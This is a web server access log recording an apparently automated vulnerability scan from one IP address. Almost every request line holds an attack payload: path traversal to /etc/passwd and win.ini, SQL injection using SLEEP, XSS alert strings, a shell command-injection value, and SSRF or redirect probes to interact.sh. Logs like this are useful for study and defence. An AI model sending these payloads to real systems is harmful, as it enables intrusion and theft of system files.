195.164.49.69 - - [20/Oct/2024:16:06:54 +0000] GET /XMII/Catalog?Mode=GetFileList&Path=Classes/../../../../../../../../../../../../etc/passwd HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:16:06:56 +0000] GET /cgi-bin/ExportLogs.sh HTTP/1.1 404 1099
195.164.49.69 - - [20/Oct/2024:16:06:58 +0000] GET /deployment-config.json HTTP/1.1 404 1096
195.164.49.69 - - [20/Oct/2024:16:06:59 +0000] GET /installation/index.php HTTP/1.1 404 1100
195.164.49.69 - - [20/Oct/2024:16:07:01 +0000] GET /umweb/../etc/passwd HTTP/1.1 404 1105
195.164.49.69 - - [20/Oct/2024:16:07:03 +0000] GET /CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en HTTP/1.1 404 1111
195.164.49.69 - - [20/Oct/2024:16:07:07 +0000] GET /sysaid/getGfiUpgradeFile?fileName=../../../../../../../etc/passwd HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:16:07:09 +0000] GET /getGfiUpgradeFile?fileName=../../../../../../../etc/passwd HTTP/1.1 404 1091
195.164.49.69 - - [20/Oct/2024:16:07:09 +0000] GET /index.php?r=installer/welcome HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:16:07:11 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:07:13 +0000] GET /admin_dev.php HTTP/1.1 404 1087
195.164.49.69 - - [20/Oct/2024:16:07:15 +0000] GET /index_dev.php HTTP/1.1 404 1087
195.164.49.69 - - [20/Oct/2024:16:07:17 +0000] GET /app_dev.php HTTP/1.1 404 1085
195.164.49.69 - - [20/Oct/2024:16:07:19 +0000] GET /ftb.imagegallery.aspx HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:16:07:24 +0000] GET /pmb/opac_css/getgif.php?chemin=../../../../../../etc/passwd&nomgif=D2JS HTTP/1.1 404 1105
83.212.98.101 - - [20/Oct/2024:16:07:26 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
195.164.49.69 - - [20/Oct/2024:16:07:26 +0000] GET /wp-content/plugins/wp-hide-security-enhancer/router/file-process.php?action=style-clean&file_path=/wp-config.php HTTP/1.1 404 1158
195.164.49.69 - - [20/Oct/2024:16:07:28 +0000] POST /wp-json/igd/v1/get-users-data HTTP/1.1 404 1115
195.164.49.69 - - [20/Oct/2024:16:07:30 +0000] GET /ad-list-search?keyword&keyword&lat&lat&long&long&location&category HTTP/1.1 404 1088
195.164.49.69 - - [20/Oct/2024:16:07:32 +0000] GET /compress.php?file=../../../../../../../etc/passwd HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:16:07:34 +0000] GET /s/2nhz0a0MMeE93nKA3riFv3TWhBd/_/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml HTTP/1.1 404 1209
195.164.49.69 - - [20/Oct/2024:16:07:36 +0000] GET /s/2nhz0a0MMeE93nKA3riFv3TWhBd/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml HTTP/1.1 404 1197
195.164.49.69 - - [20/Oct/2024:16:07:38 +0000] GET /index.dhtml?sponsor=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1 404 1085
195.164.49.69 - - [20/Oct/2024:16:07:41 +0000] GET /wp-content/plugins/sniplets/readme.txt HTTP/1.1 404 1124
195.164.49.69 - - [20/Oct/2024:16:07:43 +0000] GET /index.php?sl=../../../../../../../etc/passwd%00 HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:16:07:45 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:07:47 +0000] GET /wp-content/plugins/clickdesk-live-support-chat/readme.txt HTTP/1.1 404 1143
195.164.49.69 - - [20/Oct/2024:16:07:49 +0000] GET /wp-content/plugins/movies/readme.txt HTTP/1.1 404 1122
195.164.49.69 - - [20/Oct/2024:16:07:51 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:07:53 +0000] GET /wp-content/plugins/amty-thumb-recent-post/readme.txt HTTP/1.1 404 1138
195.164.49.69 - - [20/Oct/2024:16:07:57 +0000] POST /jolokia/read/getDiagnosticOptions HTTP/1.1 404 1115
195.164.49.69 - - [20/Oct/2024:16:08:02 +0000] GET /wp-content/plugins/jsmol2wp/readme.txt HTTP/1.1 404 1124
195.164.49.69 - - [20/Oct/2024:16:08:06 +0000] POST /service/rapture/session HTTP/1.1 404 1105
195.164.49.69 - - [20/Oct/2024:16:08:08 +0000] POST /service/rest/beta/repositories/bower/group HTTP/1.1 404 1136
195.164.49.69 - - [20/Oct/2024:16:08:10 +0000] POST /api/snapshots HTTP/1.1 404 1091
195.164.49.69 - - [20/Oct/2024:16:08:13 +0000] GET /index.php?route=/ HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:16:08:16 +0000] GET /user/login.php HTTP/1.1 404 1092
195.164.49.69 - - [20/Oct/2024:16:08:18 +0000] POST /assets/_core/php/profile.php HTTP/1.1 404 1114
195.164.49.69 - - [20/Oct/2024:16:08:20 +0000] POST /assets/php/profile.php HTTP/1.1 404 1104
195.164.49.69 - - [20/Oct/2024:16:08:22 +0000] POST /vendor/qcubed/qcubed/assets/php/profile.php HTTP/1.1 404 1137
195.164.49.69 - - [20/Oct/2024:16:08:24 +0000] PUT /v1/kv/2ni0CWW8MQjpl6lj2OZ9qdgPrrh HTTP/1.1 405 1050
195.164.49.69 - - [20/Oct/2024:16:08:26 +0000] GET /v1/kv/2ni0CWW8MQjpl6lj2OZ9qdgPrrh?raw HTTP/1.1 404 1115
195.164.49.69 - - [20/Oct/2024:16:08:28 +0000] POST /+CSCOE+/saml/sp/acs?tgname=a HTTP/1.1 404 1105
195.164.49.69 - - [20/Oct/2024:16:08:32 +0000] POST /wp-json/buddypress/v1/signup HTTP/1.1 404 1114
195.164.49.69 - - [20/Oct/2024:16:08:34 +0000] GET /wp-content/plugins/wp-statistics/readme.txt HTTP/1.1 404 1129
195.164.49.69 - - [20/Oct/2024:16:08:36 +0000] GET /wp-admin/admin.php?page=wps_pages_page&ID=0+AND+(SELECT+1+FROM+(SELECT(SLEEP(7)))test)&type=home HTTP/1.1 404 1096
195.164.49.69 - - [20/Oct/2024:16:08:38 +0000] GET /wp-admin/admin-ajax.php?action=f992d62e70496cac7084aec3a4b3deea HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:16:08:40 +0000] GET /wp-admin/admin-ajax.php?action=bd6e09fbaff6dddfb81389e0a4eecbea HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:16:08:42 +0000] GET /fmangersub?cpath=../../../../../../../etc/passwd HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:16:08:44 +0000] POST /TransferredOutModal.php?modfunc=detail HTTP/1.1 404 1097
195.164.49.69 - - [20/Oct/2024:16:08:46 +0000] POST /index.php HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:16:08:48 +0000] GET /?p=1&xsg-provider=%3Cimg%20src%20onerror=alert(document.domain)%3E&xsg-format=yyy&xsg-type=zz&xsg-page=pp HTTP/1.1 200 11204
- - - [20/Oct/2024:16:08:50 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:16:08:54 +0000] HEAD /wp-login.php HTTP/1.1 404 -
195.164.49.69 - - [20/Oct/2024:16:08:59 +0000] POST /wp-json/rsvpmaker/v1/stripesuccess/anythinghere HTTP/1.1 404 1137
195.164.49.69 - - [20/Oct/2024:16:09:00 +0000] GET /admin/?page=reports&date=2022-05-24-6'+AND+(SELECT+7774+FROM+(SELECT(SLEEP(0)))dPPt)+AND+'rogN'='rogN HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:16:09:02 +0000] GET /admin/?page=reports&date=2022-05-24-6'+AND+(SELECT+7774+FROM+(SELECT(SLEEP(10)))dPPt)+AND+'rogN'='rogN HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:16:09:04 +0000] GET /index.php?module=users/login HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:16:09:14 +0000] POST /api/add-article-by-text HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:16:09:15 +0000] POST /superadmincreate.php HTTP/1.1 404 1094
195.164.49.69 - - [20/Oct/2024:16:09:17 +0000] GET / HTTP/1.1 200 11204
- - - [20/Oct/2024:16:09:21 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:16:09:23 +0000] POST /ajax-api/2.0/mlflow/experiments/create HTTP/1.1 404 1128
195.164.49.69 - - [20/Oct/2024:16:09:27 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:09:31 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:09:35 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:09:39 +0000] POST /cgi-bin/supervisor/Factory.cgi HTTP/1.1 404 1112
195.164.49.69 - - [20/Oct/2024:16:09:41 +0000] GET /vpn/list_base_config.php?type=mod&parts=base_config&template=%60echo%20-e%20%272ni0CTBqwV4z0j6RlTGkPu77viy%27%3E%20%2Fwww%2Ftmp%2Finfo.html%60 HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:16:09:43 +0000] GET /tmp/info.html HTTP/1.1 404 1091
195.164.49.69 - - [20/Oct/2024:16:09:45 +0000] GET /kylin/api/user/authentication HTTP/1.1 404 1115
195.164.49.69 - - [20/Oct/2024:16:09:52 +0000] GET /kylin/api/user/authentication HTTP/1.1 404 1115
195.164.49.69 - - [20/Oct/2024:16:09:53 +0000] GET /kylin/api/user/authentication HTTP/1.1 404 1115
195.164.49.69 - - [20/Oct/2024:16:09:54 +0000] GET /kylin/api/user/authentication HTTP/1.1 404 1115
195.164.49.69 - - [20/Oct/2024:16:09:55 +0000] GET /kylin/api/user/authentication HTTP/1.1 404 1115
195.164.49.69 - - [20/Oct/2024:16:09:56 +0000] GET /kylin/api/user/authentication HTTP/1.1 404 1115
195.164.49.69 - - [20/Oct/2024:16:09:58 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:09:59 +0000] GET /camunda/app/welcome/default/ HTTP/1.1 404 1118
195.164.49.69 - - [20/Oct/2024:16:10:03 +0000] GET /cgi-bin/login.cgi?username=admin&password=admin HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:16:10:05 +0000] POST /j_security_check HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:16:10:07 +0000] GET /menu/home HTTP/1.1 404 1087
195.164.49.69 - - [20/Oct/2024:16:10:11 +0000] POST /userpost/xerox.set HTTP/1.1 404 1096
195.164.49.69 - - [20/Oct/2024:16:10:13 +0000] POST /v1/app/writeFileSync HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:16:10:15 +0000] POST /v1/app/readFileSync HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:16:10:17 +0000] GET /user/requireLogin HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:16:10:19 +0000] GET /properties-list.php?property-types=1&types=2&location&prices&bedroom&code=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 404 1093
- - - [20/Oct/2024:16:10:21 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:16:10:25 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:10:27 +0000] GET /Export_Log?/etc/passwd HTTP/1.1 404 1084
83.212.98.101 - - [20/Oct/2024:16:10:44 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
195.164.49.69 - - [20/Oct/2024:16:11:00 +0000] GET /api/moduleInformation HTTP/1.1 404 1099
195.164.49.69 - - [20/Oct/2024:16:11:03 +0000] GET /wp-content/uploads/wpdm-cache/ HTTP/1.1 404 1116
195.164.49.69 - - [20/Oct/2024:16:11:05 +0000] GET /examples/jsp/snp/snoop.jsp;%3Cscript%3Ealert%28document.domain%29%3C/script%3Etest.jsp HTTP/1.1 404 1176
195.164.49.69 - - [20/Oct/2024:16:11:08 +0000] GET /wp-content/plugins/hmapsprem/views/dashboard/index.php?p=/wp-content/plugins/hmapsprem/foo%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1 404 1148
195.164.49.69 - - [20/Oct/2024:16:11:09 +0000] GET /calendar/calendar_form.php/%22%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E HTTP/1.1 404 1170
195.164.49.69 - - [20/Oct/2024:16:11:11 +0000] GET /logout?next=%208%22onmouseover=%22alert(document.domain) HTTP/1.1 404 1080
195.164.49.69 - - [20/Oct/2024:16:11:13 +0000] GET /ie50/system/login/SysLoginUser.aspx?Login=Denied&UID=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1 404 1121
195.164.49.69 - - [20/Oct/2024:16:11:15 +0000] GET /system/login/SysLoginUser.aspx?Login=Denied&UID=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1 404 1112
195.164.49.69 - - [20/Oct/2024:16:11:17 +0000] GET /sidekiq HTTP/1.1 404 1081
195.164.49.69 - - [20/Oct/2024:16:11:19 +0000] GET ///interact.sh/%2F.. HTTP/1.1 400 1169
195.164.49.69 - - [20/Oct/2024:16:11:21 +0000] GET /wp-content/plugins/adaptive-images/adaptive-images-script.php/%3Cimg/src/onerror=alert(document.domain)%3E/?debug=true HTTP/1.1 404 1209
195.164.49.69 - - [20/Oct/2024:16:11:23 +0000] GET /index.php/component/jemessenger/box_details?task=download&dw_file=../../.././../../../etc/passwd HTTP/1.1 404 1129
195.164.49.69 - - [20/Oct/2024:16:11:25 +0000] GET /index.jsp HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:11:27 +0000] GET /info/dir?/ HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:16:11:29 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:11:31 +0000] GET /..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fwin.ini HTTP/1.1 400 1169
195.164.49.69 - - [20/Oct/2024:16:11:33 +0000] GET /_ignition/health-check HTTP/1.1 404 1100
195.164.49.69 - - [20/Oct/2024:16:11:35 +0000] GET /api/v2.0/search?q=/ HTTP/1.1 404 1097
195.164.49.69 - - [20/Oct/2024:16:11:37 +0000] GET /res/../admin/diagnostic.jsp HTTP/1.1 404 1113
195.164.49.69 - - [20/Oct/2024:16:11:39 +0000] GET /.well-known/acme-challenge/../../admin/diagnostic.jsp HTTP/1.1 404 1147
195.164.49.69 - - [20/Oct/2024:16:11:41 +0000] GET /update/../admin/diagnostic.jsp HTTP/1.1 404 1116
195.164.49.69 - - [20/Oct/2024:16:11:44 +0000] GET /i/?rid HTTP/1.1 404 1080
195.164.49.69 - - [20/Oct/2024:16:11:45 +0000] GET /api/sso/v2/sso/jwt?error_url=http://interact.sh HTTP/1.1 404 1108
195.164.49.69 - - [20/Oct/2024:16:11:47 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:11:49 +0000] GET /downloadfile.php?file=../../../../../../../../../../etc/passwd HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:16:11:51 +0000] GET /wp-content/plugins/church-admin/display/download.php?key=../../../../../../../etc/passwd HTTP/1.1 404 1142
195.164.49.69 - - [20/Oct/2024:16:11:53 +0000] GET /message?title=x&msg=%26%23%3Csvg/onload=alert(1337)%3E%3B HTTP/1.1 404 1081
195.164.49.69 - - [20/Oct/2024:16:11:55 +0000] GET /remote/error?errmsg=ABABAB--%3E%3Cscript%3Ealert(1337)%3C/script%3E HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:16:11:58 +0000] GET /%2f/ HTTP/1.1 400 1169
195.164.49.69 - - [20/Oct/2024:16:12:00 +0000] GET /sample-apps/hello/%2f/ HTTP/1.1 400 1169
195.164.49.69 - - [20/Oct/2024:16:12:01 +0000] GET /?gf_page=randomstring HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:12:03 +0000] GET /.dockerfile HTTP/1.1 404 1085
195.164.49.69 - - [20/Oct/2024:16:12:05 +0000] GET /.Dockerfile HTTP/1.1 404 1085
195.164.49.69 - - [20/Oct/2024:16:12:07 +0000] GET /Dockerfile HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:16:12:09 +0000] GET /?lang=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Cp%20class=%22&p=1 HTTP/1.1 200 11204
- - - [20/Oct/2024:16:12:11 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:16:12:14 +0000] GET /mod/jitsi/sessionpriv.php?avatar=https%3A%2F%2Fsdc.iopan.pl:80%2Fuser%2Fpix.php%2F498%2Ff1.jpg&nom=test_user%27)%3balert(document.domain)%3b//&ses=test_user&t=1 HTTP/1.1 404 1107
195.164.49.69 - - [20/Oct/2024:16:12:15 +0000] GET /api/index.php/v1/config/application?public=true HTTP/1.1 404 1125
195.164.49.69 - - [20/Oct/2024:16:12:17 +0000] GET /api/v1/config/application?public=true HTTP/1.1 404 1111
195.164.49.69 - - [20/Oct/2024:16:12:19 +0000] GET /wgarcmin.cgi?NEXTPAGE=D&ID=1&DOC=../../../../etc/passwd HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:16:12:21 +0000] GET /mobile/error-not-supported-platform.html?desktop_url=javascript:alert(1337);//itms:// HTTP/1.1 404 1118
195.164.49.69 - - [20/Oct/2024:16:12:23 +0000] GET /weibo/topic/%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1 400 1169
195.164.49.69 - - [20/Oct/2024:16:12:25 +0000] GET /descriptorByName/AuditTrailPlugin/regexCheck?value=*j%3Ch1%3Esample HTTP/1.1 404 1126
83.212.98.101 - - [20/Oct/2024:16:12:26 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
195.164.49.69 - - [20/Oct/2024:16:12:27 +0000] GET /jenkins/descriptorByName/AuditTrailPlugin/regexCheck?value=*j%3Ch1%3Esample HTTP/1.1 404 1138
195.164.49.69 - - [20/Oct/2024:16:12:29 +0000] GET /bin/view/Main/Search?sort=score&sortOrder=desc&highlight=true&facet=true&r=1&f_locale=en&f_locale&text=objcontent%3Aemail* HTTP/1.1 404 1106
195.164.49.69 - - [20/Oct/2024:16:12:31 +0000] GET /xwiki/bin/view/Main/Search?sort=score&sortOrder=desc&highlight=true&facet=true&r=1&f_locale=en&f_locale&text=objcontent%3Aemail* HTTP/1.1 404 1116
195.164.49.69 - - [20/Oct/2024:16:12:33 +0000] GET /wp-content/backups-dup-lite/tmp/ HTTP/1.1 404 1118
195.164.49.69 - - [20/Oct/2024:16:12:35 +0000] GET /wp-content/backups-dup-pro/tmp/ HTTP/1.1 404 1117
195.164.49.69 - - [20/Oct/2024:16:12:37 +0000] GET /cgi-bin/printenv HTTP/1.1 404 1094
195.164.49.69 - - [20/Oct/2024:16:12:39 +0000] GET /Pic/Indexs?imgs=DJwkiEm6KXJZ7aEiGyN4Cz83Kn1PLaKA09 HTTP/1.1 404 1088
195.164.49.69 - - [20/Oct/2024:16:12:41 +0000] GET /?wptouch_switch=desktop&redirect=https://interact.sh/ HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:12:43 +0000] GET /community/?foro=signin&redirect_to=https://interact.sh/ HTTP/1.1 404 1088
195.164.49.69 - - [20/Oct/2024:16:12:45 +0000] GET /AccessAnywhere/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cwindows%255cwin.ini HTTP/1.1 404 1262
195.164.49.69 - - [20/Oct/2024:16:12:47 +0000] GET /.vscode/ HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:16:12:48 +0000] GET /haproxy-status HTTP/1.1 404 1088
195.164.49.69 - - [20/Oct/2024:16:12:50 +0000] GET /haproxy?stats HTTP/1.1 404 1081
195.164.49.69 - - [20/Oct/2024:16:12:53 +0000] GET /seeyon/webmail.do?method=doDownloadAtt&filename=index.jsp&filePath=../conf/datasourceCtp.properties HTTP/1.1 404 1095
- - - [20/Oct/2024:16:12:55 +0000] GET null HTTP/1.1 400 2308
- - - [20/Oct/2024:16:12:57 +0000] GET null HTTP/1.1 400 2308
- - - [20/Oct/2024:16:12:59 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:16:13:01 +0000] GET /install/froxlor.sql HTTP/1.1 404 1097
195.164.49.69 - - [20/Oct/2024:16:13:03 +0000] GET /index.php?content=../../../../../../../../etc/passwd HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:16:13:05 +0000] GET /user/sign_up HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:16:13:07 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:13:08 +0000] GET /ocp.php HTTP/1.1 404 1081
195.164.49.69 - - [20/Oct/2024:16:13:10 +0000] GET /index.php?q=file:///etc/passwd HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:16:13:12 +0000] GET /avatar/1%3fd%3dhttp%3A%252F%252Fimgur.com%252F..%25252F1.1.1.1 HTTP/1.1 404 1140
195.164.49.69 - - [20/Oct/2024:16:13:14 +0000] GET /grafana/avatar/1%3fd%3dhttp%3A%252F%252Fimgur.com%252F..%25252F1.1.1.1 HTTP/1.1 404 1152
195.164.49.69 - - [20/Oct/2024:16:13:16 +0000] GET /api/snapshots/:key HTTP/1.1 404 1100
195.164.49.69 - - [20/Oct/2024:16:13:18 +0000] GET /wp-content/plugins/usc-e-shop/functions/content-log.php?logfile=/etc/passwd HTTP/1.1 404 1145
195.164.49.69 - - [20/Oct/2024:16:13:20 +0000] GET /wp-content/plugins/usc-e-shop/functions/content-log.php?logfile=/Windows/win.ini HTTP/1.1 404 1145
195.164.49.69 - - [20/Oct/2024:16:13:22 +0000] GET /wp-content/plugins/webp-converter-for-media/includes/passthru.php?src=https://interact.sh HTTP/1.1 404 1155
195.164.49.69 - - [20/Oct/2024:16:13:24 +0000] GET /wp-content/plugins/video-synchro-pdf/reglages/Menu_Plugins/tout.php?p=tout HTTP/1.1 404 1161
195.164.49.69 - - [20/Oct/2024:16:13:26 +0000] GET /wp-admin/admin-ajax.php?action=eventon_ics_download&event_id=1 HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:16:13:28 +0000] GET /_src HTTP/1.1 404 1078
195.164.49.69 - - [20/Oct/2024:16:13:30 +0000] GET /downloader.php?file=../../../../../../../../../../../../../etc/passwd%00.jpg HTTP/1.1 404 1088
195.164.49.69 - - [20/Oct/2024:16:13:32 +0000] GET /onlinePreview?url=aHR0cDovL3d3dy54eHguY29tL3h4eC50eHQiPjxpbWcgc3JjPTExMSBvbmVycm9yPWFsZXJ0KDEpPjEyMw%3D%3D HTTP/1.1 404 1087
195.164.49.69 - - [20/Oct/2024:16:13:34 +0000] GET /system/download?download-url=/_a7/p49dm7f4qjyt/output/&name=exam.pdf HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:16:13:36 +0000] GET /user.ini HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:16:13:38 +0000] GET /.user.ini HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:16:13:40 +0000] GET /index.php?option=com_svmap&controller=../../../../../../../etc/passwd%00 HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:16:13:42 +0000] GET /webui/file_guest?path=/var/www/documentation/../../../../../etc/passwd&flags=1152 HTTP/1.1 404 1094
195.164.49.69 - - [20/Oct/2024:16:13:44 +0000] GET /webmail/basic/?referer=https://interact.sh&_c=auth&ctz=120&signup_password&_a%5bsignup%5d=1 HTTP/1.1 404 1096
195.164.49.69 - - [20/Oct/2024:16:13:46 +0000] GET /cliniccases/lib/php/data/messages_load.php?type=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1 404 1132
195.164.49.69 - - [20/Oct/2024:16:13:48 +0000] GET /static/shards.html HTTP/1.1 404 1096
195.164.49.69 - - [20/Oct/2024:16:13:50 +0000] GET /static/shards/html HTTP/1.1 404 1100
195.164.49.69 - - [20/Oct/2024:16:13:52 +0000] GET /install/ HTTP/1.1 404 1086
- - - [20/Oct/2024:16:13:54 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:16:13:56 +0000] GET /wp-content/plugins/wpmudev-updates/keys/ HTTP/1.1 404 1130
195.164.49.69 - - [20/Oct/2024:16:13:58 +0000] GET /osclass/oc-admin/index.php?page=appearance&action=render&file=../../../../../../../../../../etc/passwd HTTP/1.1 404 1108
195.164.49.69 - - [20/Oct/2024:16:14:00 +0000] GET /wp-admin/admin.php?page=MEC-ix&tab=MEC-export&mec-ix-action=export-events&format=csv HTTP/1.1 404 1096
195.164.49.69 - - [20/Oct/2024:16:14:02 +0000] GET /visualizza_tabelle.php?anno=2021&tipo_tabella=prenotazioni&sel_tab_prenota=tutte&wo03b%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ew5px3=1 HTTP/1.1 404 1096
195.164.49.69 - - [20/Oct/2024:16:14:04 +0000] GET /storia_soldi.php?piu17%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ee3esq=1 HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:16:14:06 +0000] GET /tabella.php?jkuh3%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Eyql8b=1 HTTP/1.1 404 1085
195.164.49.69 - - [20/Oct/2024:16:14:08 +0000] GET /crea_modelli.php?anno=2021&id_sessione&fonte_dati_conn=attuali&T_PHPR_DB_TYPE=postgresql&T_PHPR_DB_NAME=%C2%9E%C3%A9e&T_PHPR_DB_HOST=localhost&T_PHPR_DB_PORT=5432&T_PHPR_DB_USER=%C2%9E%C3%A9e&T_PHPR_DB_PASS=%C2%9E%C3%A9e&T_PHPR_LOAD_EXT=NO&T_PHPR_TAB_PRE=%C2%9E%C3%A9e&anno_modello=2021&lingua_modello=en&cambia_frasi=SIipq85%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ef9xkbujgt24&form_availability_calendar_template=1 HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:16:14:10 +0000] GET /data/plugins_listing HTTP/1.1 404 1098
195.164.49.69 - - [20/Oct/2024:16:14:12 +0000] GET /iproperty/property-views/all-properties-with-map?filter_keyword=pihil%22onmouseover=%22alert(document.domain)%22style=%22position:absolute;width:100%;height:100%;top:0;left:0;%22f63m4&option=com_iproperty&view=allproperties&ipquicksearch=1 HTTP/1.1 404 1130
195.164.49.69 - - [20/Oct/2024:16:14:14 +0000] GET /mysql_config.ini HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:16:14:17 +0000] GET /?wahi=JzthbGVydChkb2N1bWVudC5kb21haW4pOy8v HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:16:14:18 +0000] GET /wp-content/uploads/ao_ccss/queuelog.html HTTP/1.1 404 1126
195.164.49.69 - - [20/Oct/2024:16:14:20 +0000] GET /blog/wp-content/uploads/ao_ccss/queuelog.html HTTP/1.1 404 1135
195.164.49.69 - - [20/Oct/2024:16:14:22 +0000] GET /config/pw_left_bar.html HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:16:14:24 +0000] GET /index.php/javascript%26colon%3Balert(document.domain);dd%26sol%3b%26sol%3b HTTP/1.1 404 1152
- - - [20/Oct/2024:16:14:26 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:16:14:28 +0000] GET /core/authorize.php HTTP/1.1 404 1096
195.164.49.69 - - [20/Oct/2024:16:14:30 +0000] GET /nagios/cgi-bin/status.cgi HTTP/1.1 404 1107
195.164.49.69 - - [20/Oct/2024:16:14:32 +0000] GET /cgi-bin/nagios4/status.cgi HTTP/1.1 404 1108
195.164.49.69 - - [20/Oct/2024:16:14:34 +0000] GET /cgi-bin/nagios3/status.cgi HTTP/1.1 404 1108
195.164.49.69 - - [20/Oct/2024:16:14:36 +0000] GET /downloader.log HTTP/1.1 404 1088
195.164.49.69 - - [20/Oct/2024:16:14:38 +0000] GET /index.php?option=com_news_portal&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:16:14:40 +0000] GET /index.php?option=com_alphauserpoints&view=../../../../../../../../../../etc/passwd%00 HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:16:14:42 +0000] GET /%5C../ssl/yaws-key.pem HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:16:14:44 +0000] GET /glpi/plugins/barcode/front/send.php?file=../../../../../../../../etc/passwd HTTP/1.1 404 1125
195.164.49.69 - - [20/Oct/2024:16:14:46 +0000] GET /install.php?profile=default HTTP/1.1 404 1085
195.164.49.69 - - [20/Oct/2024:16:14:48 +0000] GET /core/install.php HTTP/1.1 404 1094
